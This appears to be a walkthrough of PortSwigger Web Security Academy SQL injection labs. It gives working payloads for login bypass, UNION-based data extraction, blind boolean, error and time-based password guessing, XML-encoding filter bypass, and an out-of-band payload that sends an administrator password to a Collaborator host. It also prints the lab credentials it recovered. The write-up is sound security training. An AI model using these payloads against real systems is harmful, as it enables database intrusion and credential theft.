Walk-through of SQL injection lab on PortSwigger Web Security Academy.
Use the Hackvertor extension to URL encode the payload.
- Apprentice – SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- Apprentice – SQL injection vulnerability allowing login bypass
- Practitioner – SQL injection UNION attack, determining the number of columns returned by the query
- Practitioner – SQL injection UNION attack, finding a column containing text
- Practitioner – SQL injection UNION attack, retrieving data from other tables
- Practitioner – SQL injection UNION attack, retrieving multiple values in a single column
- Practitioner – SQL injection attack, querying the database type and version on Oracle
- Practitioner – SQL injection attack, querying the database type and version on MySQL and Microsoft
- Practitioner – SQL injection attack, listing the database contents on non-Oracle databases
- Practitioner – SQL injection attack, listing the database contents on Oracle
- Practitioner – Blind SQL injection with conditional responses
- Practitioner – Blind SQL injection with conditional errors
- Practitioner – Visible error-based SQL injection
- Practitioner – Blind SQL injection with time delays
- Practitioner – Blind SQL injection with time delays and information retrieval
- Practitioner – Blind SQL injection with out-of-band interaction
- Practitioner – Blind SQL injection with out-of-band data exfiltration
- Practitioner – SQL injection with filter bypass via XML encoding
Apprentice – SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- Intercept requests using Burp Suite.
- Click on a category in the search.
- Send the request to the repeater.
- Add encoded “‘ or 1=1–” to the category.
GET /filter?category=<@urlencode>Corporate gifts' or 1=1-- <@/urlencode> HTTP/1.1Apprentice – SQL injection vulnerability allowing login bypass
- Click on Login
- Enter administrator as the user
- Enter “‘ or 1=1–” as the password
Practitioner – SQL injection UNION attack, determining the number of columns returned by the query
GET /filter?category=<@urlencode>' UNION SELECT NULL, NULL, NULL -- <@/urlencode> HTTP/1.1Practitioner – SQL injection UNION attack, finding a column containing text
Unique string to retrieve was “ZoD3B6”.
GET /filter?category=<@urlencode>whatever' UNION SELECT null, 'ZoD3B6', null -- <@/urlencode> HTTP/1.1Practitioner – SQL injection UNION attack, retrieving data from other tables
The database contains a different table called users, with columns called username and password. Then log in as administrator.
Find number of columns using the UNION clause
GET /filter?category=<@urlencode>whatever' UNION SELECT null, null -- <@/urlencode> HTTP/1.1Extract users and passwords
GET /filter?category=<@urlencode>whatever' UNION SELECT username, password FROM users -- <@/urlencode> HTTP/1.1carlos:rifvs4iiwpiegvajsb4l
wiener:5ferfkh1o05ecxoy1u8m
administrator:9ze5m3d2n4vmh7p5x6ouLog in with user “administrator” and password “9ze5m3d2n4vmh7p5x6ou”.
Practitioner – SQL injection UNION attack, retrieving multiple values in a single column
Find number of columns using the UNION clause
GET /filter?category=<@urlencode>whatever' UNION SELECT null, null -- <@/urlencode> HTTP/1.1Extract data
GET /filter?category=<@urlencode>whatever' UNION SELECT null, CONCAT(username,':',password) FROM users -- <@/urlencode> HTTP/1.1wiener:bxmfaspk6mju403htpqg
administrator:y148iiauuw687zfxuff8
carlos:ana1gcotyrh006ysxctcLog in with user “administrator” and password “y148iiauuw687zfxuff8”.
Practitioner – SQL injection attack, querying the database type and version on Oracle
Find number of columns using the UNION clause
GET /filter?category=<@urlencode>whatever' UNION SELECT null, null FROM DUAL -- <@/urlencode> HTTP/1.1Both columns are displayed (value ‘a’ and ‘b’).
GET /filter?category=<@urlencode>whatever' UNION SELECT 'a', 'b' FROM DUAL -- <@/urlencode> HTTP/1.1Extract Database version
GET /filter?category=<@urlencode>whatever' UNION SELECT banner, 'b' FROM v$version -- <@/urlencode> HTTP/1.1Practitioner – SQL injection attack, querying the database type and version on MySQL and Microsoft
GET /filter?category=<@urlencode>whatever' UNION SELECT @@version, null -- <@/urlencode> HTTP/1.1Practitioner – SQL injection attack, listing the database contents on non-Oracle databases
Find number of columns using the UNION clause
GET /filter?category=<@urlencode>whatever' UNION SELECT 'a', null -- <@/urlencode> HTTP/1.1Find DBMS & version
GET /filter?category=<@urlencode>whatever' UNION SELECT version(), null -- <@/urlencode> HTTP/1.1DBMS is “”PostgreSQL 12.12 (Ubuntu 12.12-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit.
List tables
GET /filter?category=<@urlencode>whatever' UNION SELECT table_name, null FROM information_schema.tables WHERE table_schema = 'public' -- <@/urlencode> HTTP/1.1users_wfwayp
productsList columns
GET /filter?category=<@urlencode>whatever' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'users_wfwayp' -- <@/urlencode> HTTP/1.1password_axravo
username_nstgukExtract data (user/pass)
GET /filter?category=<@urlencode>whatever' UNION SELECT username_nstguk,password_axravo FROM users_wfwayp -- <@/urlencode> HTTP/1.1administrator:olp7le4nsgjcb8qi6qx2
wiener:93dbyy3bukep1gdnjx1x
carlos:5s1m1zf03k541ycr95b3Log in with user “administrator” and password “olp7le4nsgjcb8qi6qx2”.
Practitioner – SQL injection attack, listing the database contents on Oracle
Find number of columns using the UNION clause
GET /filter?category=<@urlencode>whatever' UNION SELECT null, null FROM DUAL -- <@/urlencode> HTTP/1.1Find DBMS & version
GET /filter?category=<@urlencode>whatever' UNION SELECT banner, null FROM v$version -- <@/urlencode> HTTP/1.1DBMS is “Oracle Database 11g Express Edition Release 11.2.0.2.0 – 64bit Production”.
List tables
GET /filter?category=<@urlencode>whatever' UNION SELECT owner || '.' ||table_name, null FROM all_tables -- <@/urlencode> HTTP/1.1PETER.USERS_VYFZUTList columns
GET /filter?category=<@urlencode>whatever' UNION SELECT column_name, null FROM all_tab_columns WHERE owner='PETER' AND table_name='USERS_VYFZUT' -- <@/urlencode> HTTP/1.1PASSWORD_BHZMKG
USERNAME_TXYAFDExtract data
GET /filter?category=<@urlencode>whatever' UNION SELECT USERNAME_TXYAFD, PASSWORD_BHZMKG FROM PETER.USERS_VYFZUT -- <@/urlencode> HTTP/1.1administrator:tirn63sjk0u7fctysiz1
carlos:3ymcz0cq6e3xs3dfbawd
wiener:e1hyyxybycm1f5mdewdrLog in with user “administrator” and password “tirn63sjk0u7fctysiz1”.
Practitioner – Blind SQL injection with conditional responses
Test for injection
The “Welcome back” message is in the server’s response.
Cookie: TrackingId=<@urlencode>whatever' OR 1=1 -- <@/urlencode>;Test that a row is returned for user administrator
Cookie: TrackingId=<@urlencode>whatever' UNION SELECT password FROM users WHERE username = 'administrator' -- <@/urlencode>;Find the administrator’s password
Use the Intruder module to check for every character except the “%” and “_” characters as they have a meaning in the SQL “LIKE” function. When no characters are found, try the “_” character.
Cookie: TrackingId=<@urlencode>whatever' UNION SELECT password FROM users WHERE username = 'administrator' AND password LIKE 'tin_rboqnci_%' -- <@/urlencode>;We can also find password length (20 chars) using the underscore:
Cookie: TrackingId=<@urlencode>whatever' UNION SELECT password FROM users WHERE username = 'administrator' AND password LIKE 'tin9rboqnci_________' -- <@/urlencode>;Cookie: TrackingId=<@urlencode>whatever' UNION SELECT password FROM users WHERE username = 'administrator' AND password LIKE 'tin9rboqncig4mrychdt' -- <@/urlencode>;Log in with user “administrator” and password “tin9rboqncig4mrychdt”.
Practitioner – Blind SQL injection with conditional errors
Find the DBMS
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT 'a' FROM DUAL)='a' -- <@/urlencode>;DBMS is Oracle
Build the query to discover the password
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT password FROM users WHERE username = 'administrator')='a' -- <@/urlencode>;Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password LIKE '%') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;These are valid SQL queries that do not trigger an error.
Try triggering an error
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (1=0) THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;Find the password length
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password LIKE '_') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;Increase the length until HTTP 200 OK is returned by the server.
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password LIKE '____________________') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;Password has 20 characters.
Find the password
Send the request to the Intruder module. Check for every character except the “%” and “_” characters as they have a meaning in the SQL “LIKE” function.
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password LIKE '§_§___________________') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;[…]
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password LIKE 'q9v8t97x9vsje2rrm§_§__') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;Send the request to the repeater and validate the password found
Cookie: TrackingId=<@urlencode>whatever' AND (SELECT CASE WHEN (password = 'q9v8t97x9vsje2rrmtxs') THEN 1 ELSE 1/0 END FROM users WHERE username = 'administrator')=1 -- <@/urlencode>;Log in with user “administrator” and password “q9v8t97x9vsje2rrmtxs”.
Practitioner – Visible error-based SQL injection
This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned. The database contains a different table called users, with columns called username and password. To solve the lab, find a way to leak the password for the administrator user, then log in to their account.
Try adding a single quote to the cookie:
Cookie: TrackingId=whatever';Unterminated string literal started at position 44 in SQL SELECT * FROM tracking WHERE id = 'whatever''. Expected charAdd a subquery and cast the returned value to an integer:
Cookie: TrackingId=' AND CAST((SELECT 1) AS int) -- ;ERROR: argument of AND must be type boolean, not type integerThe expected type is boolean, so add “=1”:
Cookie: TrackingId=' AND CAST((SELECT 1) AS int)=1 -- ;The query is valid (no errors).
The input is truncated so we cannot write the full subquery for the administrator account. Use “LIMIT 1”. The administrator is often the first account created in a system and is often the first line.
Cookie: TrackingId=' AND CAST((SELECT username FROM users LIMIT 1) AS int)=1 -- ;ERROR: invalid input syntax for type integer: "administrator"Extract the password using the same technique.
Cookie: TrackingId=' AND CAST((SELECT password FROM users LIMIT 1) AS int)=1 -- ;ERROR: invalid input syntax for type integer: "zfp8exhvbpkked4026g7"Log in with user “administrator” and password “zfp8exhvbpkked4026g7”.
Practitioner – Blind SQL injection with time delays
Since the DBMS used is unknown, try different payloads until a delay of 10 seconds is executed. Use the SQL injection cheat sheet. The DBMS is PostgreSQL.
Cookie: TrackingId=<@urlencode>whatever'; SELECT pg_sleep(10) -- <@/urlencode>;Practitioner – Blind SQL injection with time delays and information retrieval
Find the DBMS
DBMS is PostgreSQL (like previous exercise).
Cookie: TrackingId=<@urlencode>whatever'; SELECT pg_sleep(10) -- <@/urlencode>;Build the query to discover the password
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END -- <@/urlencode>;Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE '%') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Find the password length
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (LENGTH(password) = 20) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Password has 20 characters.
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE '____________________') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Send the request to the Intruder module. Check for every character except the “%” and “_” characters as they have a meaning in the SQL “LIKE” function. Set the resource pool to 1 request at a time. In the Columns menu, add Time of day.
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE '§_§___________________') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Observe the attack and look for the character that triggers the 10 seconds delay or check Time of day to see the 10 seconds difference between 2 characters.
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE 'uj5byiatct§_§_________') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE 'uj5byiatctcpmdyudsa§_§') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Validate the password
Use the Repeater module to validate the password found.
Cookie: TrackingId=<@urlencode>whatever'; SELECT CASE WHEN (password LIKE 'uj5byiatctcpmdyudsah') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator' -- <@/urlencode>;Log in with user “administrator” and password “uj5byiatctcpmdyudsah”.
Practitioner – Blind SQL injection with out-of-band interaction
Select text “BURP-COLLABORATOR-SUBDOMAIN”, right-click and select “Insert Collaborator payload” to insert a the Burp Collaborator subdomain.
Cookie: TrackingId=<@urlencode>whatever' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual -- Practitioner – Blind SQL injection with out-of-band data exfiltration
Select text “BURP-COLLABORATOR-SUBDOMAIN”, right-click and select “Insert Collaborator payload” to insert a the Burp Collaborator subdomain.
Cookie: TrackingId=<@urlencode>whatever' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual -- <@/urlencode>;The Collaborator server received a DNS lookup of type A for the domain name flxpvehzs08jev6bv9or.BURP-COLLABORATOR-SUBDOMAIN.
Log in with user “administrator” and password “flxpvehzs08jev6bv9or”.
Practitioner – SQL injection with filter bypass via XML encoding
Try to extract the password
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1 UNION SELECT password from users WHERE username = 'administrator' --</storeId></stockCheck>The server responds with “Attack detected”.
Bypass filter via XML encoding
Send the payload to the Decoder module. Select Encode as HTML.
1 UNION SELECT password from users WHERE username = 'administrator' --<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1 UNION SELECT password from users WHERE username = 'administrator' --</storeId></stockCheck>Log in with user “administrator” and password “2qigy0infbnhlwwocib0”.